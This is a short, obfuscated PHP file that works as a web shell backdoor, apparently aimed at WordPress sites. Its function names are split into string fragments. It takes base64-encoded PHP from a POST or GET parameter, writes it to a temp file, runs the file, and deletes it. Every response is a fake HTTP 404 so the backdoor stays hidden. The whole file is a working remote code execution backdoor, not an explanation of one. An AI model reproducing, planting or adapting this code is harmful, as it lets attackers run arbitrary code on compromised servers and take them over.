<?php
try{
$nfefd3[]='base64_deco'.'de';
$nfefd3[]='temp'.'nam';
$nfefd3[]='array_'.'key_exists';
$nfefd3[]='file_put_conten'.'ts';
$nfefd3[]='sys'.'_get_temp_dir';
$nfefd3[]='unli'.'nk';
$of5b12='1a7'.'05e6a';
if($nfefd3[2]($of5b12,$_POST)){
$l08091=$nfefd3[0]($_POST[$of5b12]);
}elseif($nfefd3[2]($of5b12,$_GET)){
$l08091=$nfefd3[0]($_GET[$of5b12]);
}else{$l08091=null;}
if($l08091){
$j7bcf1=$nfefd3[1]($nfefd3[4](),'w'.'p_');
if($j7bcf1){
$nfefd3[3]($j7bcf1,'<'.'?ph'.'p '.$l08091);
http_response_code(404);
@include_once($j7bcf1);
@$nfefd3[5]($j7bcf1);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
